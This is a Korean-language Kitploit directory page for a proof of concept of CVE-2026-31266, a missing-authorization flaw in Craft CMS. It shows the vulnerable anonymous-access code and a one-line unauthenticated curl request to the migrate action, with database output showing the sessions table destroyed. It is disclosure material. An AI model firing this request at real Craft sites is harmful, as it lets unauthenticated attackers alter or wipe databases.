Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Craftcms-PoC-CVE-2026-31266 — Security research on Craft CMS authentication mechanism | Kitploit
도구/GitHubGitHub/0xrixet/craftcms-poc-cve-2026-31266
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthentication
GitHub0xrixet/craftcms-poc-cve-2026-31266

Craftcms-PoC-CVE-2026-31266

Security research on Craft CMS authentication mechanism

저장소 보기
2개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-31266 - Craft CMS 권한 누락

CVE 정보

필드값
CVE IDCVE-2026-31266
공급업체Pixel & Tonic
제품Craft CMS
영향받는 버전<= 5.9.5
CWECWE-862 (권한 누락)
CVSS7.3 (높음)
보안 연구원0xRIXET

증거 내용

  • screenshots/ - Proof of Concept 시연

취약점

  • 유형: 권한 누락
  • 영향: 인증 우회
  • 공급업체: Craft CMS
  • 상태: CVE-2026-31266

취약한 코드

파일: src/controllers/AppController.php

65-68행:

root@kitploit:~
protected array|bool|int $allowAnonymous = [
    'migrate' => self::ALLOW_ANONYMOUS_LIVE | self::ALLOW_ANONYMOUS_OFFLINE,
];

개념 증명

root@kitploit:~
# allowAdminChanges=false 설정 상태
curl -X POST "http://target/actions/app/migrate"

증거

공격 전:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
+----------+
| COUNT(*) |
+----------+
|        0 |
+----------+

공격 후:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
ERROR 1146 (42S02): Table 'sessions' doesn't exist

참고 자료

  • Craft CMS 저장소
  • Craft 보안 문서
  • NVD 항목

연락처

  • 보안 연구원: 0xRIXET | Mohammed Al-shehri
  • 트위터 | X: @0xRIXET
  • 이메일: [email protected]
도구 다운로드